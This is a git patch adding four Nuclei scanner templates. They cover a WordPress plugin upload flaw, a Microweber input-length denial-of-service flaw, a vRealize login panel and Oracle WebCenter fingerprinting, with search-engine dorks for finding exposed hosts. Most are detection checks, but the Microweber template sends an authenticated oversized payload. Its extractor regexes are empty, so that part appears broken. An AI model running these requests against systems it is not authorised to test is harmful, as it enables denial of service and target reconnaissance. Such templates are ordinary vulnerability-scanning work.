From 34c47842f35fee45551e5993fc6e2e9f1fccbe74 Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Sun, 7 Aug 2022 10:08:20 +0800
Subject: [PATCH] up PoCs 2022-08-07
---
.../cves/2021/CVE-2021-24370.yaml | 42 ++++++++++
.../cves/2022/CVE-2022-0968.yaml | 77 +++++++++++++++++++
.../vrealize-loginsight-panel.yaml | 26 +++++++
.../oracle/oracle-webcenter-sites.yaml | 27 +++++++
4 files changed, 172 insertions(+)
create mode 100644 config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
create mode 100644 config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
create mode 100644 config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
new file mode 100644
index 000000000..0e9fb5eb0
--- /dev/null
+++ b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-24370
+
+info:
+ name: Fancy Product Designer WordPress plugin - Remote Code Execution (Detection)
+ author: pikpikcu
+ severity: critical
+ description: |
+ Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.
+ reference:
+ - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
+ - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24370
+ - https://lists.openwall.net/full-disclsure/2020/11/17/2
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-24370
+ cwe-id: CWE-434,CWE-434
+ metadata:
+ google-dork: inurl:“/wp-content/plugins/fancy-product-designer”
+ tags: cve,cve2021,wordpress,rce,wp-plugin,wp,fancyproduct
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{"error":"You need to define a directory'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
new file mode 100644
index 000000000..43552faa0
--- /dev/null
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
@@ -0,0 +1,77 @@
+id: CVE-2022-0968
+
+info:
+ name: Microweber < 1.2.12 - Integer Overflow (DOS)
+ author: amit-jd
+ severity: medium
+ description: |
+ The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
+ reference:
+ - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
+ - /~https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
+ - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2022-0968
+ cwe-id: CWE-190
+ tags: cve,cve2022,overflow,microweber,cms
+
+variables:
+ payload: '{{repeat("A", 600)}}'
+
+requests:
+ - raw:
+ - |
+ POST /api/user_login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ - |
+ GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /api/user/2 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
+
+ req-condition: true
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(body_3,'\"first_name\":\"{{payload}}\"')
+ - 'status_code_3==200'
+ - 'contains(all_headers_3,"application/json")'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ name: form_token
+ internal: true
+ group: 1
+ regex:
+ - ''
+
+ - type: regex
+ part: body
+ name: user
+ internal: true
+ group: 1
+ regex:
+ - ''
+
+ - type: regex
+ part: body
+ name: email
+ internal: true
+ group: 1
+ regex:
+ - ''
diff --git a/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml b/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
new file mode 100644
index 000000000..01ac1b145
--- /dev/null
+++ b/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
@@ -0,0 +1,26 @@
+id: vrealize-loginsight-panel
+
+info:
+ name: vRealize Log Insight Panel
+ author: pussycat0x
+ severity: info
+ description: Detect vRealize Log Insight login panel
+ metadata:
+ verified: true
+ shodan-dork: title:"vRealize Log insight"
+ tags: panel,vmware,vrealize
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login?loginUrl=%2Findex"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'vRealize Log Insight'
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml b/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
new file mode 100644
index 000000000..9e814a20a
--- /dev/null
+++ b/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
@@ -0,0 +1,27 @@
+id: oracle-webcenter-sites
+
+info:
+ name: Oracle WebCenter Sites
+ author: leovalcante
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.html:"WebCenter"
+ tags: tech,oracle,webcenter
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/welcome_webcenter.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'FOR ORACLE'
+ - 'WebCenter Framework'
+ condition: and
+
+ - type: status
+ status:
+ - 200